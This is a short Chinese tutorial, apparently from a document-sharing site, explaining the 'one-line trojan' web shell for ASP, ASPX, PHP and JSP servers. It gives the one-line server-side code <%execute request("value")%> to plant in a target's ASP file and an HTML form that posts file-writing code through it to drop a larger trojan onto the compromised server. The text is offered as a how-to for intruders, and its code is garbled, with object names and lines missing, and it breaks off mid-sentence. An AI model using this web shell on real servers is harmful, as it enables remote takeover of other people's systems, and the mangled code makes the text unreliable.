文档介绍:一句话木马的原理及利用(asp,aspx,php,jsp)
一句话木马的适用环境:
,如果能将一句话插入到asp文件中也可
一句话木马的工作原理:
"一句话木马"服务端(本地的html提交文件)
就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为<%execute request("value")%> 其中value可以自己修改
"一句话木马"客户端(远程服务器上被插入一句话的asp文件)
用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件
(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>,,我们就可以在本地构造一个表单内容如下:(//为注释)
<form action=http://主机路径/ method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=("")//建立流对象
//打开
=2 //以文本方式
="gb2312" //字体标准
request("newvalue")
(""),2 //,2就是已覆盖的方式
//关闭对象
set lP=nothing //释放对象
"" //
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>
<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)
,第一个表单里的代码是文件操作的代码()那么第二个表单当然就是我们要写入的马了.
具体的就